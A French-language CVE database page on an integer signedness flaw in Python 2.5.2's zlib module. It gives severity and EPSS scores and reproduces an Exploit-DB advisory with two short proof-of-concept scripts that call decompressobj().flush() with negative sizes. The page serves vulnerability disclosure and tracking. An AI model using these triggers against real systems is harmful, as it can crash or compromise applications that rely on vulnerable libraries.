CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Integer signedness error in the zlib extension module in Python 2.5.2 and earlier allows remote attackers to execute arbitrary code via a negative signed integer, which triggers insufficient memory allocation and a buffer overflow.
Incorrect Conversion between Numeric Types When converting from one data type to another, such as long to integer, data can be omitted or translated in a way that produces unexpected values. If the resulting values are used in a sensitive context, then dangerous behaviors may occur.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
7.5
AV:N/AC:L/Au:N/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
47.94%
–
–
2022-07-17
–
–
47.94%
–
–
2022-07-24
–
–
47.94%
–
–
2022-10-02
–
–
47.94%
–
–
2023-03-12
–
–
–
10.08%
–
2024-02-11
–
–
–
10.08%
–
2024-06-02
–
–
–
10.08%
–
2024-12-08
–
–
–
9.88%
–
2024-12-22
–
–
–
33.63%
–
2025-01-05
–
–
–
34.35%
–
2025-01-19
–
–
–
34.35%
–
2025-03-18
–
–
–
–
23.43%
2025-03-30
–
–
–
–
23.43%
2025-04-06
–
–
–
–
23.43%
2025-04-06
–
–
–
–
23.43,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2008-04-08 22h00 +00:00 Auteur : Justin Ferguson EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/28715/info
Python zlib module is prone to a remote buffer-overflow vulnerability because the library fails to properly sanitize user-supplied data.
An attacker can exploit this issue to execute arbitrary code with the privileges of the user running an application that relies on the affected library. Failed exploit attempts will result in a denial-of-service condition.
This issue affects Python 2.5.2; other versions may also be vulnerable.
python-2.5.2-zlib-unflush-misallocation.py
------------------------------------------
#!/usr/bin/python
import zlib
msg = """
Desire to know why, and how, curiosity; such as is in no living creature
but man:
so that man is distinguished, not only by his reason, but also by this
singular passion
from other animals; in whom the appetite of food, and other pleasures of
sense, by
predominance, take away the care of knowing causes; which is a lust of
the mind,
that by a perseverance of delight in the continual and indefatigable
generation of knowledge, exceedeth the short vehemence of any carnal
pleasure.
"""
compMsg = zlib.compress(msg)
bad = -24
decompObj = zlib.decompressobj()
decompObj.decompress(compMsg)
decompObj.flush(bad)
python-2.5.2-zlib-unflush-signedness.py:
----------------------------------------
#!/usr/bin/python
import zlib
msg = """
Society in every state is a blessing, but government even in its best
state is but a necessary evil
in its worst state an intolerable one; for when we suffer, or are
exposed to the same miseries by a
government, which we might expect in a country without government, our
calamities is heightened by
reflecting that we furnish the means by which we suffer! Government,
like dress, is the badge of
lost innocence; the palaces of kings are built on the ruins of the
bowers of paradise. For were
the impulses of conscience clear, uniform, and irresistibly obeyed, man
would need no other
lawgiver; but that not being the case, he finds it necessary to
surrender up a part of his property
to furnish means for the protection of the rest; and this he is induced
to do by the same prudence which
in every other case advises him out of two evils to choose the least.
Wherefore, security being the true
design and end of government, it unanswerably follows that whatever form
thereof appears most likely to
ensure it to us, with the least expense and greatest benefit, is
preferable to all others.
""" * 1024
compMsg = zlib.compress(msg)
bad = -2
decompObj = zlib.decompressobj()
decompObj.decompress(compMsg, 1)
decompObj.flush(bad)
Products Mentioned
Configuraton 0
Python>>Python >> Version From (including) 2.4.0 To (excluding) 2.4.6